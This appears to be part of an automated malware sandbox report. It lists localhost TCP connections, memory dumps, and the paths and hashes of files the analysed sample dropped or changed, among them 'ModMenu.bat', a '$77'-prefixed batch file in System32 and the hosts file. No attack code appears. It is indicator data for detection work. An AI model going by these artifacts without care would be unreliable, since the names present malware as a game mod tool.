| N/A | 127.0.0.1:57328 | tcp | |
| N/A | 127.0.0.1:57331 | tcp | |
| N/A | 127.0.0.1:57337 | tcp | |
| N/A | 127.0.0.1:57339 | tcp | |
| N/A | 127.0.0.1:57354 | tcp | |
| N/A | 127.0.0.1:57386 | tcp | |
| N/A | 127.0.0.1:57389 | tcp | |
| N/A | 127.0.0.1:57446 | tcp | |
| N/A | 127.0.0.1:57448 | tcp | |
| N/A | 127.0.0.1:57462 | tcp | |
| N/A | 127.0.0.1:57476 | tcp | |
| N/A | 127.0.0.1:57492 | tcp | |
| N/A | 127.0.0.1:57508 | tcp | |
| N/A | 127.0.0.1:57521 | tcp | |
| N/A | 127.0.0.1:57534 | tcp | |
| N/A | 127.0.0.1:57549 | tcp | |
| N/A | 127.0.0.1:57567 | tcp | |
| N/A | 127.0.0.1:57570 | tcp | |
| N/A | 127.0.0.1:57600 | tcp | |
| N/A | 127.0.0.1:57615 | tcp | |
| N/A | 127.0.0.1:57620 | tcp | |
| N/A | 127.0.0.1:57644 | tcp | |
| N/A | 127.0.0.1:57659 | tcp | |
| N/A | 127.0.0.1:57673 | tcp | |
| N/A | 127.0.0.1:57698 | tcp | |
| N/A | 127.0.0.1:57713 | tcp | |
| N/A | 127.0.0.1:57727 | tcp | |
| N/A | 127.0.0.1:57742 | tcp | |
| N/A | 127.0.0.1:57759 | tcp | |
| N/A | 127.0.0.1:57763 | tcp | |
| N/A | 127.0.0.1:57810 | tcp | |
| N/A | 127.0.0.1:57824 | tcp | |
| N/A | 127.0.0.1:57838 | tcp | |
| N/A | 127.0.0.1:57841 | tcp | |
| N/A | 127.0.0.1:57866 | tcp | |
| N/A | 127.0.0.1:57880 | tcp | |
| N/A | 127.0.0.1:57884 | tcp | |
| N/A | 127.0.0.1:57909 | tcp | |
| N/A | 127.0.0.1:57932 | tcp | |
| N/A | 127.0.0.1:57940 | tcp | |
| N/A | 127.0.0.1:57943 | tcp | |
| N/A | 127.0.0.1:57968 | tcp | |
| N/A | 127.0.0.1:57972 | tcp | |
| N/A | 127.0.0.1:57985 | tcp | |
| N/A | 127.0.0.1:58015 | tcp | |
| N/A | 127.0.0.1:58017 | tcp | |
| N/A | 127.0.0.1:58040 | tcp |
Files
memory/4464-0-0x00007FF97EB03000-0x00007FF97EB05000-memory.dmp
memory/4464-1-0x0000000000560000-0x000000000057A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Rasauq SoftWorks.exe
| MD5 | 12a225de8199d2a31f049a6f300d8cfa |
| SHA1 | 24819a452cf1db15167a52b12f258d27baacbd6e |
| SHA256 | 1399d955881d9db34cbe261c117818a7933a1cc7c8cdabcff8fc22c880053801 |
| SHA512 | 3e321ac6e35b83e0645611721354a03358da7dde8bc42f761e258f87fa2ae8a33c3778aa48b10e0ead87331eded7240b7134f9c05333a823a53258f7a52cac32 |
memory/4464-10-0x00007FF97EB00000-0x00007FF97F5C2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\sRasauq SoftWorks.exe
| MD5 | 7091469b8f2213255ba3c2870a60c7eb |
| SHA1 | 17e501e4900bf5dacc5cb0424db87d2ce7a89880 |
| SHA256 | d63b09f1a44ed10ff2e6aa558ab494ad561066fff13de330eae87e6749a0e3d7 |
| SHA512 | f67a4244cf2f4c6fdc728441d85e4e3d6cea3fd28fcc2b21aefc385257d3ad4eb177ff58acb07621b6fb6d4c331b7df80f5a9bd7a53c5d54bb91f000138223b8 |
memory/2080-28-0x0000000000980000-0x000000000098E000-memory.dmp
memory/5228-29-0x0000000000F40000-0x0000000000F5A000-memory.dmp
memory/5228-31-0x00007FF97EB00000-0x00007FF97F5C2000-memory.dmp
memory/2080-33-0x00007FF97EB00000-0x00007FF97F5C2000-memory.dmp
memory/4464-32-0x00007FF97EB00000-0x00007FF97F5C2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Launch.bat
| MD5 | 41bded52aa489cdea31a174f89bca818 |
| SHA1 | da072fb11e72d2762f96d0f901d7ef7bca17218d |
| SHA256 | 2172bb0729d91bcf777bbdd0c42dae9c71de0f1251d165655f551673bf622d59 |
| SHA512 | d0fa53492e783e627186d96dcf3ffcecc10f8895bd42a16f4946c34de6e4ec2bc156bab0e070ec0ebf9492f394d11d4c7929df1b57ca59cb6e11a566de3a6dd9 |
C:\Users\Admin\AppData\Local\Temp\ModMenu.bat
| MD5 | 48e8089eae5c8c602b20696cf2840f50 |
| SHA1 | b02784c1b5e3fa8a3f2a1ff615870719aeda2b16 |
| SHA256 | ab3e6e5835550f067ce594533afba7c8c3320891298ebb6fb76f7bdc8b049174 |
| SHA512 | 38f90b076c34ff3e25750a69c8b506897d8b0ed2d4a113cbabd496c06b337a206b1a21fde667bef207276bf36e986ab58d384e5467c2ac38280394fa3d27cd10 |
memory/4972-45-0x000001F445060000-0x000001F4450E6000-memory.dmp
memory/4972-55-0x000001F445200000-0x000001F445304000-memory.dmp
memory/4972-56-0x000001F445000000-0x000001F445022000-memory.dmp
memory/4972-54-0x000001F42C910000-0x000001F42C920000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1xp5bsiq.bn3.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 5e6baeec02c3d93dce26652e7acebc90 |
| SHA1 | 937a7b4a0d42ea56e21a1a00447d899a2aca3c28 |
| SHA256 | 137bf90e25dbe4f70e614b7f6e61cba6c904c664858e1fe2bc749490b4a064c0 |
| SHA512 | 461990704004d7be6f273f1cee94ea73e2d47310bac05483fd98e3c8b678c42e7625d799ac76cf47fe5e300e7d709456e8c18f9854d35deb8721f6802d24bea4 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 9c641493f463ea0f418e229be7b384ad |
| SHA1 | c2e41f792970c65a36869125304956e1ff2c4727 |
| SHA256 | b846abd32e1d5976dedf646cf4af48aa83e7a44fa2ec49ca69bba79e5a54633d |
| SHA512 | c3746ab0f9c0d4f01ac396d8a516d2c65e513820222fd0b9a54c9ae7b0faf1f91b54fa3153f62312e96d6e76b334e42f1f9c97f630c50ecb519642332619308b |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 1cebd15e19078003226326aa50667159 |
| SHA1 | 6d346e2ff9b8b6834a3e4b58240c41f5178e57f9 |
| SHA256 | ee661e2b1fa0a222a50eee925fae81512cc15faf5473a5740999e66f5eda4abe |
| SHA512 | 81ed3fd080d4e463514db6a6df8e54c24969ff8a2aea98f66153c12e0809b4e0429b2192f19afc1160ebe700c9774ce3e9e417ed3c2539e7bcbd996c94be75a4 |
C:\Windows\System32\Rasauq\$77RasauqBroker.bat
| MD5 | cf3bb14e0c83a42f2816ee7b618c5e20 |
| SHA1 | b7aba5689a4f9ea64d7b84080fdd3ceb480b6479 |
| SHA256 | 1b8e622c06028a69920c094ddb35c1d4a403e57f6cf4ac436f007ce5ca55d75f |
| SHA512 | 4bf26aaa8a5c067d8545ca096353bf3cde151814fcc931858d9446181357226388f589a89cd4bd4f366454d029b4c9119bd86c0e426986afaeebdec83af968c0 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | e07eea85a8893f23fb814cf4b3ed974c |
| SHA1 | 8a8125b2890bbddbfc3531d0ee4393dbbf5936fe |
| SHA256 | 83387ce468d717a7b4ba238af2273da873b731a13cc35604f775a31fa0ac70ea |
| SHA512 | 9d4808d8a261005391388b85da79e4c5396bdded6e7e5ce3a3a23e7359d1aa1fb983b4324f97e0afec6e8ed9d898322ca258dd7cda654456dd7e84c9cbd509df |
C:\Users\Admin\AppData\Local\Temp\IMG_3728.png
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 4093e5ab3812960039eba1a814c2ffb0 |
| SHA1 | b5e4a98a80be72fccd3cc910e93113d2febef298 |
| SHA256 | c0794e2b7036ce5612446a8b15e0c8387773bbc921f63cf8849f8a1f4ef3878c |
| SHA512 | f3555b45aa1a1dd5214716dc81a05905c4ecd5a3e1276d35e08c65623ab1d14d469b3b576a5d9638264c1222d73889d2cc1ee43fb579d9ca3fcddd9f557cac7b |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | da135dd054f4d60d35617da0fea2c263 |
| SHA1 | 8d28cb50ae7775e54fe6b77b5c6c486d1f016aad |
| SHA256 | 0e5c4ecd696d501ddf5f36a0ba78375607afa23b5773f80079a0a65df0cb9037 |
| SHA512 | 38dd1d0f06fa8a7c410021493dd8ed2fd47cfb9cc8acfd8c22409a5e9cd59874e3df5ba94de16eabc63d1961d233500f84069b1e33aa184da63c0a2bd7fb4a84 |
C:\Windows\System32\Recovery\ReAgent.xml
| MD5 | 910f3916ede823b6b4b5e302e6ececbe |
| SHA1 | d41dda3f32687605193ad0f421c6b3e2bc48ec97 |
| SHA256 | 5cd6fa01b3949b7fca0fdbdab434d93badcfcdf09de8e2881268abf7ed7064fa |
| SHA512 | 893f4a7f2cb3b6aa2ebd0e82f1ab55658b4e7791872bfb97dd269c35df0199c9b590e0902a83cfc8ae85f883f8adb6f514593d4dde68d2c0a5406ecc7851f582 |
C:\Users\Admin\AppData\Roaming\Microsoft\Speech\Files\UserLexicons\SP_FEC6341EA56F49E6A6B9046EA09BF823.dat
| MD5 | e8f06dc3412e11a884caae4029ee3a75 |
| SHA1 | 7145f085e901328329d7bee0284d1bd4ae8acb05 |
| SHA256 | 4724b5c0cc5b00fea2b852a0a2204216ab13f76166a53562444c1ce19c2de75f |
| SHA512 | 64330366377f7a0a893ae2f8d71d27af3b6c75b27289f96e721887dedbb304d794c6fedbbdf03ce5f94d4c3fb0b06ebcca852fd3af2b694f8ce3479a6918be41 |
memory/2080-165-0x000000001D2E0000-0x000000001D322000-memory.dmp
C:\Windows\Logs\ReAgent\ReAgent.log
| MD5 | a4decb7fb1e423f2404a56ab1f65a907 |
| SHA1 | 1e45fdc45ce92e461d1765870e2548374dd65f57 |
| SHA256 | d0930146e00fd4be9d7644b5fac04e127d9f4d409fe57f4d64bae8383ddc3cc5 |
| SHA512 | f1a3ea5484016e5fbb3c857d3bf4666cec5707bdfaf2063638a35101bfa29cbc3747e31672e8c2772e4c53f0cc83453dfe202a2380e65601ec631dedf8d821d1 |
C:\Windows\Panther\UnattendGC\diagwrn.xml
| MD5 | 62da0914b34786cc72b0a513c1d027e9 |
| SHA1 | c77eee5b56160402f3060ad64fdb0cd5ff730233 |
| SHA256 | b8e1414e0fa30d6d2309f070285a3b5cac056f878bf07702c957b243718b99a9 |
| SHA512 | f36acb087e1942ad8999cc291eb37e1dd6adba38535c112c94e0260e11c03ceea96f47dbfa9dfb3e0f708860a3641bb664750a6fe149d3b525b37b7da5eba166 |
C:\Windows\Panther\UnattendGC\diagerr.xml
| MD5 | a62ffbfda792b7a5b82e9e4c811136f8 |
| SHA1 | b0b0df4a14352937ce3e51489bb9f4bcf9277767 |
| SHA256 | 413f51c6bb954ca181537ae42d3b1860d52a44ae9c0b4ff2412e2f3058113280 |
| SHA512 | 1e3e7a1c70001a41570b813cc5e0ea76607fd2d25bb349641570efc47d264e9c4c8e29b3a51fd5fe1cb8c83e6ea42ff0f6af62c1e54c80133dd60f1255c73cc2 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | be40db6c8fd0d8b32dd97d14f10f8d1c |
| SHA1 | b0f3a526f60d03ca3e0e6ecd5340358b0d345768 |
| SHA256 | cca996ce3a1fb9cc44bcacc9002798fc66eab27146004d38e65ef98539510f66 |
| SHA512 | 0c595146fef4919951f9f04b2f13a03094d51c87063882ffe9beb1f1b0e36fb08ca3ff53bdf0bf1c234e02ac7f878fe5bf185ec8db2c437651e74a9a47414f4f |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 2e8eb51096d6f6781456fef7df731d97 |
| SHA1 | ec2aaf851a618fb43c3d040a13a71997c25bda43 |
| SHA256 | 96bfd9dd5883329927fe8c08b8956355a1a6ceb30ceeb5d4252b346df32bc864 |
| SHA512 | 0a73dc9a49f92d9dd556c2ca2e36761890b3538f355ee1f013e7cf648d8c4d065f28046cd4a167db3dea304d1fbcbcea68d11ce6e12a3f20f8b6c018a60422d2 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 80b42fe4c6cf64624e6c31e5d7f2d3b3 |
| SHA1 | 1f93e7dd83b86cb900810b7e3e43797868bf7d93 |
| SHA256 | ee20a5b38a6674366efda276dbbf0b43eb54efd282acfc1033042f6b53a80d4d |
| SHA512 | 83c1c744c15a8b427a1d3af677ec3bfd0353875a60fe886c41570981e17467ebbb59619b960ca8c5c3ab1430946b0633ea200b7e7d84ab6dca88b60c50055573 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | b0a85f07903eaad4aace8865ff28679f |
| SHA1 | caa147464cf2e31bf9b482c3ba3c5c71951566d1 |
| SHA256 | c85c7915e0bcc6cc3d7dd2f6b9d9e4f9a3cf0ccefa043b1c500facac8428bfd5 |
| SHA512 | 7a650a74a049e71b748f60614723de2b9d2385a0f404606bcb22ae807e22a74c53cf672df9e7a23605dfff37865443a5899eafea323134a818eb59c96e0f94bd |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 050567a067ffea4eb40fe2eefebdc1ee |
| SHA1 | 6e1fb2c7a7976e0724c532449e97722787a00fec |
| SHA256 | 3952d5b543e5cb0cb84014f4ad9f5f1b7166f592d28640cbc3d914d0e6f41d2e |
| SHA512 | 341ad71ef7e850b10e229666312e4bca87a0ed9fe25ba4b0ab65661d5a0efa855db0592153106da07134d8fc2c6c0e44709bf38183c9a574a1fa543189971259 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 311174334b8e31fc10d28c4575e92688 |
| SHA1 | e2b2b2100f0445b4d37cd16f82d3cfcca3abf335 |
| SHA256 | 793aa8f317799c4ad031a7ba58960643c29f03a24b2baba577cc1ccdcbe46a76 |
| SHA512 | e7ddc1cf4443564bee7f00a66f2e533d1d89f6ab9434ea75ae7aeec4e8aa56ba40d27c81e472c92724fc892a7726232280274397d3506d95275af41337fc0135 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 0b59f3fa12628f63b5713c4833570d7f |
| SHA1 | badcf18f1fdc94b1eadf63f27c09ad092c4a6ccb |
| SHA256 | 2332e52881483559d787508831c00192c4f0a4fedc232b0309e566a30247af1d |
| SHA512 | 01724fd9f7a20ec5ff3d2686593d5d95069135834e9b156ced36985067fb36e7b3ec2a0018e41fa125ad5d1e42c80be9e148632a9b655f2d41c1400a4320abe7 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | f7beb7e466697232c9e7428a14c08099 |
| SHA1 | 8565273d9ffc49170849c80b8c9d8f6b95b45376 |
| SHA256 | 30b250907b357d4192ab1fd59c4355ebf9f1083c1f41e54e7068a4358fc0af81 |
| SHA512 | 001217e0d0d6db19bcf5672246cf567449750ae56b1399c28dcb53951af90ddd19f77d3159d9779d51713d180ebc36fcdaf06db80b4885bd907b3c8832d2d98e |
C:\Windows\System32\drivers\etc\hosts
| MD5 | a37a771cb0d99a67e2c2f874617f651f |
| SHA1 | d8c6399e0788602d09274a517ebe5bc0748aff49 |
| SHA256 | cd0a4b242a5fb807396265e62e60ef3183798b645ba605bd73843c65c9f965ce |
| SHA512 | a448985a53ba7efe5ffd1d953f1450404b8812074b8c10f6c97fc0225318ec77f539ff5b55d2b72b2cdbe1b395b88cd262b0454fea0717e0c36bfd3918d22209 |
memory/5228-266-0x00007FF97EB00000-0x00007FF97F5C2000-memory.dmp
C:\Windows\System32\drivers\etc\hosts
| MD5 | c84af9ede4c93ac47aedace7ed31e074 |
| SHA1 | b2d2b133dcd227805ff1ff9b713d7703d799080c |
| SHA256 | c02ef00939218bd0bd8b1320a45eb12ee5d9602fa34b0393d7d810d77d051b31 |
| SHA512 | 630ebe6e97c1d65593edd76cca1cee56544875adea2b90d89c0fc8fa872c845e0deeb400c9109a3404958114a7fa3492c1608926d5ab6e907c43b48c205d125f |
C:\Windows\INF\cdrom.PNF
| MD5 | 51d202839e64aea21820be5889d9e4db |
| SHA1 | d40617bac03de830d2aa0ad22553701c10add79a |
| SHA256 | d0fda023db84c5301f310babf7b8507fdcb5b2358187629cee9bbfa724a61fde |
| SHA512 | edf9d0a6d382c6f446687bf2d5ec547074de24822bb0ccfaf26efb76f88323fc758f3226eda1e83f6bc0260b201de61acc0f4d3614194bae9b864aa62e5adc1e |
C:\Windows\INF\printqueue.PNF
| MD5 | 8e663b6b1b218909260efe0aafd02ac8 |
| SHA1 | 036ef8a98f5fc5cdbe41874ae0259cf138678c67 |
| SHA256 | ead39a83315c7d65f024833556d2a79c4debd0ce24928981f0c9642e910ebbbe |
| SHA512 | 2558c239133833f37902072597a2634ca989846bfe9a43dd6ca2c134d141d1088d80474c8530cd38bdd42faf95e51171b681518103d511a41e958a03c38b135d |
C:\Windows\INF\netrtl64.PNF
| MD5 | 99d1c7023c6e86d02f1cd3d9cf8c356d |
| SHA1 | 343085219dc37cea79a8b5d675f107a2c2965b75 |
| SHA256 | 6c0bbcf4065d128576ab8f4502afbd9495387bd66d13f0ae05e7058ad6615043 |
| SHA512 | 34b0e561ba12da4ff2eff99b724d0d2b9fb7cc150f22772970aa6d4ad37652ae650489bbe43ec706fa25ea6e4b3c33f3e793bfdbab1fd5c1ddb9edfd9ad727a2 |
C:\Windows\INF\input.PNF
| MD5 | 335195d9951525feca205919212dee44 |
| SHA1 | e91694f839cf6e1364c4798f56fa161f811c7139 |
| SHA256 | 2969ca3f06c4aa8f5ffe871199e8e9883a18b5b927fb7810ac7998e7aa7efc6b |
| SHA512 | fdfb51a4f760e94b3ca9ba9ec8642bfcd94eee2bdb3df436e17352c8538c0f97df0a736678a6951dc74d908121c28e6d6d6753bf8d4c9d4ed38b9ad8188c8714 |
memory/2080-318-0x00007FF97EB00000-0x00007FF97F5C2000-memory.dmp
C:\Windows\INF\audioendpoint.PNF
| MD5 | bcfe0caff384393ee934e4c718943758 |
| SHA1 | 62d28e33fd5529bc728753ff88b2efd1c9bfa9f6 |
| SHA256 | 9339ec09c41976c41e99c75c32bdfd2f7626286e9ee3d455e2b5e9f1b259f2ba |
| SHA512 | 0fb55173411948e5ce85474fd02b32e0622a7a945a1bd802c87f97e4ed7366a86ed159a86d138f2c3949459ca45b454bf259f4dc40af58337397567ae4552f31 |
C:\Windows\INF\volmgr.PNF
| MD5 | d7936ee1fa6c908b5c06c6bc40eeed8b |
| SHA1 | 36efcb724f301a2b0e66eb321ca0be697c4d294b |
| SHA256 | 6514032e24de6905926eb7356ea9f6f6b3ee52a18b70fc7e87d95a074484b55a |
| SHA512 | 21d6aa35622da61fb3f1aff9e47ee17aa1adf0143ced7454931d4361584ebd2681a75fcbddde381be1e415565d0dbbbcc48b0454a55e9895848bf379836ffa2c |
C:\Windows\INF\monitor.PNF
| MD5 | d6e9f9248f9ccc90f7a70e1ecc9e1a78 |
| SHA1 | bf97315111a64611ac94b0a86107b32aa5857070 |
| SHA256 | f7293fef8bf3b2817b2b235db2da537b44462af7fe95a76ecd5f6aaf0e7957ab |
| SHA512 | 0954f22a5197a25aec64aeae74d89feaae93d1bebf416a2b08c1d39ba5320707b50806f7254ef63f0e955733e4961674b985ac56a96a9b7f12a61815d2103f3b |
C:\Windows\INF\keyboard.PNF
| MD5 | 4e797204d9109d6b58572b132687e6c7 |
| SHA1 | d39f5decf1076dfd522c37e49d9d86814ce621c4 |
| SHA256 | 2d3b6bc70181b072dd77298096669e8ef4ffa77d28621c7c004203185d48c99f |
| SHA512 | 7a81c291cb0d42d5aed09720ac0841de6406dbdb28cc757a16cf5f73d7a44b7b1e9eef8156b3bc9796ab44bb67b3f0be2ca63cd2b538b888eed2d7145f2b48e5 |
C:\Windows\INF\compositebus.PNF
| MD5 | eb6f6d2b90d0ba6667f373d943b65d09 |
| SHA1 | 8f03383cac305011f948c36d962b5ccfe2a0f2c0 |
| SHA256 | af8e47c370461c672a0d332ceef4b28f93371ffc672ce55826e621a650853ea5 |
| SHA512 | 8e1b2c50c13b264b87cdfb6c6bb814ac8f6e441a0668c35676a4db4902c3219901b6fbccbc622badc54b4452056eef8a21ca37bbdd6436447fcdee09b8c53943 |
C:\Windows\INF\acpi.PNF
| MD5 | 2219f9a3eda0e0349cb76df9abc9d10d |
| SHA1 | 1acd70887e2217fbcb8df59b53dfbbf107eb46df |
| SHA256 | 5d7a91735f3e20ed5c3376d55c3a3313f8c7dc9cbcb990fa3228bf9b44aa503d |
| SHA512 | 808c57da78983625788c115c63365a6baa9d28226ea749f572cb2b01465eb87a61965e64368fa87b95dff67d8bd2975116ddb2ea01bffb36eb14ec72dd8798db |
C:\Windows\INF\msmouse.PNF
| MD5 | fcfca2194cac88ba601031947675fadf |
| SHA1 | 87026bda6004146de7a62a7fedfe1fb56e9a017e |
| SHA256 | 34a0901cf4b2e444a24bfab742af19c8a54c2e9cd59210cca12254ee20ea2024 |
| SHA512 | fdc1a71728a8a3efebc7e764cec38d4f01a895e98691eca8c230efe81055e0e5dc5d7b37f2f658283fe5686778c64268db781e7ea07927d6ab927f77b1fa31a6 |
C:\Windows\INF\swenum.PNF
| MD5 | 79e4d57ef6b88bd1e20e10d5fc51c08a |
| SHA1 | 947f15e91b3e7f98b9610e8b2f0156cd47261f1a |
| SHA256 | bcb10f963dd4478a3afe6d8e4f3b67a894be9b55139b97ecd9ab4cba5d52cf1b |
| SHA512 | d1c50604d0a8edcb27b1ec5bea6c80d01ec46cf4172483af8e513e8aeaf97647f4f7e0ba0f5f3ac5c40f496b61eb4ec1ab5cdea87f9cd0191e7caee8406f1c94 |
C:\Windows\INF\rdpbus.PNF
| MD5 | 850954b1d1803cd765bd3a02a3b217a9 |
| SHA1 | cf153ebdcc3f428e0a97fe13659821cc6dea722c |
| SHA256 | 8225dc79ae71f7759c99ab47e182e3f0de86b33987a0adbc109b1dc58dfe13bf |
| SHA512 | 1b9800d0648b0b07a35afdc3a9f98ff289fae4412b980f4c611d3e738d46682007985ab3beb83d9632281a6dbfbfb3a12c79d59a4f65990347ceaee7f4eb74e7 |
C:\Windows\INF\mssmbios.PNF
| MD5 | 526443b67acd8a9460df1bd6d749d296 |
| SHA1 | 8df1f8d6cfc07d02c35b879490627c260762bc83 |
| SHA256 | ed9cb1ee86ce295162e1096cfa481450cf845c2f25eaa293f8f4f31c8120c526 |
| SHA512 | 3bfd08204e2409e0ea6d85bbc5bed2815bec68e1c1defe825f373fd60fff520bfceb86ab57896f842912c4f7f4af1af7bfdc523751bf1cbf1a2e579e62bf8b0b |
C:\Windows\INF\cpu.PNF
| MD5 | 0071da4b69f51065584a0430a42af426 |
| SHA1 | 26d9affeca9e8c3c3c419f0e0c29931d2b4dc4bd |
| SHA256 | 88246dbded17bfb5fe89487bd341737ec729c43c79993c6d5fc22b929934e82a |
| SHA512 | 1a2c90d0949b5f9470d84a8374ce3194f2b8a95b28b070ba5af835621adb204c66bee925ccc9c28b1a785373415691bb724fd6369782a8c665db239aa9b77ed3 |
C:\Windows\INF\vhdmp.PNF
| MD5 | 76308a73f5362dce58d680461728fa08 |
| SHA1 | 92c8279429ede0f0c36431868399cba07e4ae59b |
| SHA256 | faa3357e0b5f7803100a5e2972a95013128a63b0ff1f6b5766cb7d120ec9b8e8 |
| SHA512 | 05e9c674d48dc0dee0caa8f5a24a19a0a4504716b154cb5272b56701813d5128db0f83478f46bdc753809fc8b615a32d402eba9a1aa3139c67b5061be8ecb1da |
C:\Windows\INF\disk.PNF
| MD5 | 64eddf4646a00a7e1d79fdae51bef409 |
| SHA1 | 642643955b168c13bddfb78de9b2ebbc3e1e7ae9 |
| SHA256 | b805f2206c36c256a200866c7b7e1fb7e3e5cff76d913c2a37663c8b6a2b7447 |
| SHA512 | 589bb111bdd33c2f71ec8ad590322871b7e968dd499f18917a251cdf730d6ae4a14eab077b437c3030eadc85b6be19d793ec882525d5e30d1e0ad3ead64590c0 |
C:\Windows\INF\mshdc.PNF
| MD5 | eac8be5a8ef7890a4d791241dc8896c3 |
| SHA1 | 0201190a553e08c88a1ac19f44bb555e59595b79 |
| SHA256 | aa3a06eaae1c34d39ebbae7d59e1ec1a9aa0a88ae99d8722cf685fd2f793a5b4 |
| SHA512 | 9db831a58fb6a43e7d76640f97157bb95ff3d34cacbfb733e36dfd54341655aa44030fcfbef535403dc668c0f737ca750317f8a992c0d1e48affe38f803384d5 |
C:\Windows\INF\hdaudbus.PNF
| MD5 | f52fa849b5be7cc7b6122899400613b5 |
| SHA1 | f562c38080b4a4591ea6a466729bb9eb16fd3a1f |
| SHA256 | 72b94485eb52cb82080a4ce56f4ba55f76503809d27107ea3fd00711362a4474 |
| SHA512 | fdeb4a843e8baa97f17ecbd235c81b81f01ae6f6057fa3ae2acef42c34c9ab321e0c77d93de1227c13dc8db68cf176b0593ae85d14d6301883bcb6f889a598b8 |
C:\Windows\INF\pci.PNF
| MD5 | acd7bec19985c3cfe7551c8ef70efac2 |
| SHA1 | 3630fff2173b999c2443f2e27a68f78d79be1d67 |
| SHA256 | dd2db2622e33362d3f4cf6b0ba186865ab1cd6a4e6b65de114653ad5a912aa43 |
| SHA512 | 5a757362ece06148da18fd24d872113c60e23db5355c713a09b5562cfb5263c881261f2489225a8b97b769879b8f7d342816b4d8e9c627d5ecb8d4a7667d16a9 |
C:\Windows\INF\usbport.PNF
| MD5 | ac141a2c789a629c3a085b207dd95c6a |
| SHA1 | 783df62c56cf12f2f7cc6fc7f9085fbe89c722ce |
| SHA256 | 7f91514a7e5d0e490a3d331a09003e61455f902447d9771da3c96e828a2be904 |
| SHA512 | 64751132d72befb19c5eb221287c6c85a0884101f3d52e9aa6813d1a2628c8da826d62fb23940d48925a53a2bd8f810340554ce4500a6cd265d1eb030dec3299 |
C:\Windows\INF\hdaudio.PNF
| MD5 | 607404971d6b2f58e584328b4a7226d5 |
| SHA1 | 40612e86fa273a73e9d051497dfe73ede6a7fbb8 |
| SHA256 | cab815dfa59d7a08839217cbef9d96d51a99908000fefc241e062843ef0d0cd1 |
| SHA512 | 9aea1ff0f45199c493b6d7f94cdb77bd505931b9dbcc3dbe11c6ea44bb0930d4bcca1b5901d4c24fda922f01e446a5f4dce1bf860896d9f30153b98a9911cfd7 |
C:\Windows\INF\c_swdevice.PNF
| MD5 | 5fbb82b38fef2bb5cb9e776456133358 |
| SHA1 | 316374200f3db1e7946a1c6945cff4340abbc214 |
| SHA256 | f83183c41bbe36abdc7161ae51733997fcf010631a7d53f675706909180fd3b2 |
| SHA512 | 5fd99a5b9212732813d0144b1d3f9b9634bd1f1e2eb97f4d66565427fcfb64a8f64edace62e633bf00606bc4989f4e389dccbb7092b7f76daa8cc3e6ba25a170 |
C:\Windows\INF\umbus.PNF
| MD5 | d153f33bcdd333f8c83b4b1c9047c90a |
| SHA1 | 73fd19545c70df8b83b96dd991923900952334d5 |
| SHA256 | aa4f3d59235dfddf68a2e8002a563f376cc84a901948767b4b60f005ff0b2dc9 |
| SHA512 | 03dfe1d77bee9c8e1c40a038d69b4777b345da896a96f33383c126492e9906cea3fca31ab7e9488acd8c8f4c74d0706d9aca68b043cb97194fdb8420aa056e07 |
C:\Windows\INF\kdnic.PNF
| MD5 | 7e0f9faa92a3f9def73617e78e23443f |
| SHA1 | 50c9d963563dcf1fe9045d0b873fd22839e0e717 |
| SHA256 | ee4e7ee8fd6e3fbba07d32b4b1eb6f1fdf9999c0da4ba0ddced33d542c7461c9 |
| SHA512 | b6a6c29c512bf1296e3727cfb4efd12e153839cc50bed3a8171cdaf59c3a7c0a5012909cf0f7f96e21c2fc4e267973c69b339fef91d38451b5fe6e8ec9275c49 |
C:\Windows\INF\volume.PNF
| MD5 | c04c572e99b89dc5877efb53192ba2c1 |
| SHA1 | f9ece4a06549f70a935f0889535508a672f1d1fb |
| SHA256 | 5d47006ac8e0c5742a7ff27ac043174bf9aae244688718f93962686cab79a052 |
| SHA512 | d8749d0c526bb4ae8b4f1064f8e40519f728a7c5d053695a5b1fe842ec25a14b3f64664c21a66c82605faa02fc5dcdaddb2c0885f5775680bd5d814df14e5849 |
C:\Windows\INF\spaceport.PNF
| MD5 | 8d3d2d50841793ca8a9eef7059e9fe3d |
| SHA1 | 124bd6b25dc410255c16a08bafddb2ec185442b7 |
